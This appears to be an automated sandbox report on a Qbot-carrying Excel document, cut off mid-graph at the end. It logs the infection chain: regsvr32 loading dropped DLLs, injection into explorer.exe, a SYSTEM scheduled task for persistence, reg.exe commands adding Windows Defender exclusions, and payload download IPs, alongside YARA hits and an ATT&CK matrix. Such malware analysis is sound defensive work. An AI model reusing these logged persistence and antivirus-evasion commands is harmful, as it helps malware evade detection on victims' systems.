                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Imqocbuplg' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Iaoaukbfna' /d '0'
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Imqocbuplg' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Iaoaukbfna' /d '0'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE0BD.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/6@0/3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,
                        Source: Compensation-2100058996-09272021.xlsOLE indicator, Workbook stream: true
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{EDBE1483-93D9-4DB4-8E22-724620786E64}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{DF562EE7-0783-4E2D-9B69-105A1F5AD943}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{DF562EE7-0783-4E2D-9B69-105A1F5AD943}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{7570AC2D-6D04-4C5F-AFB4-DE0B1AD29A62}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{EDBE1483-93D9-4DB4-8E22-724620786E64}
                        Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{7570AC2D-6D04-4C5F-AFB4-DE0B1AD29A62}
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.715260428.0000000002671000.00000004.00000001.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001A00E push ebx; ret
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001D4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10019E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1001BB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000FA00E push ebx; ret
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000FD485 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000FD4B6 push FFFFFF8Ah; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000F9D5C push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000F9E5E push cs; iretd
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000FBB29 push esi; iretd
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A242A push 00000000h; mov dword ptr [esp], esi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A242A push 00000000h; mov dword ptr [esp], edi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A242A push 00000000h; mov dword ptr [esp], ebx
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A242A push 00000000h; mov dword ptr [esp], edi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], ebp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], edx
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], esi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push esi; mov dword ptr [esp], 00000001h
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], ecx
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], ebp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], esi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], esi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A3726 push 00000000h; mov dword ptr [esp], ebp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A1424 push 00000000h; mov dword ptr [esp], ecx
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A1424 push 00000000h; mov dword ptr [esp], ecx
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A2C41 push 00000000h; mov dword ptr [esp], esi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A2C41 push 00000000h; mov dword ptr [esp], esi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A2C41 push 00000000h; mov dword ptr [esp], esi
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A2C41 push 00000000h; mov dword ptr [esp], ebp
                        Source: 44467.4314974537[1].dat.0.drStatic PE information: section name: .rdatat
                        Source: 44467.4314974537[1].dat.0.drStatic PE information: section name:
                        Source: 44467.4314974537[1].dat.0.drStatic PE information: section name:
                        Source: 44467.4314974537[1].dat.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name: .rdatat
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,

                        Persistence and Installation Behavior:

                        barindex
                        Uses cmd line tools excessively to alter registry or file dataShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.red
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.4314974537[1].datJump to dropped file
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file

                        Boot Survival:

                        barindex
                        Drops PE files to the user root directoryShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
                        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_100030B7 StartServiceCtrlDispatcherA,

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 684 base: 18102D value: E9 BA 4C F6 FF
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2552 base: 18102D value: E9 BA 4C F4 FF
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1280Thread sleep count: 50 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 568Thread sleep time: -96000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2532Thread sleep count: 52 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2596Thread sleep count: 55 > 30
                        Source: C:\Windows\SysWOW64\explorer.exe TID: 2596Thread sleep time: -92000s >= -30000s
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.4314974537[1].datJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000EAEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_008A4495 or ebx, dword ptr fs:[00000030h]
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000E5A61 RtlAddVectoredExceptionHandler,
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_000C5A61 RtlAddVectoredExceptionHandler,

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        Maps a DLL or memory area into another processShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                        Writes to foreign memory regionsShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 80000
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 18102D
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 18102D
                        Allocates memory in foreign processesShow sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
                        Injects code into the Windows Explorer (explorer.exe)Show sources
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 684 base: 80000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 684 base: 18102D value: E9
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2552 base: F0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2552 base: 18102D value: E9
                        Yara detected hidden Macro 4.0 in ExcelShow sources
                        Source: Yara matchFile source: Compensation-2100058996-09272021.xls, type: SAMPLE
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn uwqvoal /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 10:25 /ET 10:37
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Imqocbuplg' /d '0'
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Iaoaukbfna' /d '0'
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
                        Source: explorer.exe, 00000007.00000002.978387873.0000000000BF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000007.00000002.978387873.0000000000BF0000.00000002.00020000.sdmpBinary or memory string: !Progman
                        Source: explorer.exe, 00000007.00000002.978387873.0000000000BF0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000E31C2 CreateNamedPipeA,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected QbotShow sources
                        Source: Yara matchFile source: 13.2.regsvr32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.890000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.890000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.727158282.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.978062440.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.978045308.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.725678165.0000000000210000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.715078031.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.713427364.0000000000890000.00000004.00000001.sdmp, type: MEMORY

                        Remote Access Functionality:

                        barindex
                        Yara detected QbotShow sources
                        Source: Yara matchFile source: 13.2.regsvr32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.890000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.890000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.727158282.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.978062440.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.978045308.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.725678165.0000000000210000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.715078031.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.713427364.0000000000890000.00000004.00000001.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsCommand and Scripting Interpreter11Windows Service3Windows Service3Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection413Disable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsScripting2Logon Script (Windows)Scheduled Task/Job1Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsService Execution2Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsNative API1Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaExploitation for Client Execution32Rc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 492061 Sample: Compensation-2100058996-092... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for dropped file 2->54 56 Document exploit detected (drops PE files) 2->56 58 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->58 60 9 other signatures 2->60 9 EXCEL.EXE 194 32 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 48 190.14.37.178, 49165, 80 OffshoreRacksSAPA Panama 9->48 50 185.183.96.67, 80 HSAE Netherlands 9->50 52 185.250.148.213, 80 FIRSTDC-ASRU Russian Federation 9->52 46 C:\Users\user\...\44467.4314974537[1].dat, PE32 9->46 dropped 76 Document exploit detected (UrlDownloadToFile) 9->76 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        68 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->68 70 Injects code into the Windows Explorer (explorer.exe) 24->70 72 Writes to foreign memory regions 24->72 74 2 other signatures 24->74 32 explorer.exe 8 1 24->32         started        process9 file10 78 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->78 80 Injects code into the Windows Explorer (explorer.exe) 29->80 82 Writes to foreign memory regions 29->82 86 2 other signatures 29->86 35 explorer.exe 8 1 29->35         started        44 C:\Users\user\Drezd.red, PE32 32->44 dropped 84 Uses cmd line tools excessively to alter registry or file data 32->84 38 reg.exe 1 32->38         started        40 reg.exe 1 32->40         started        signatures11 process12 signatures13 62 Uses 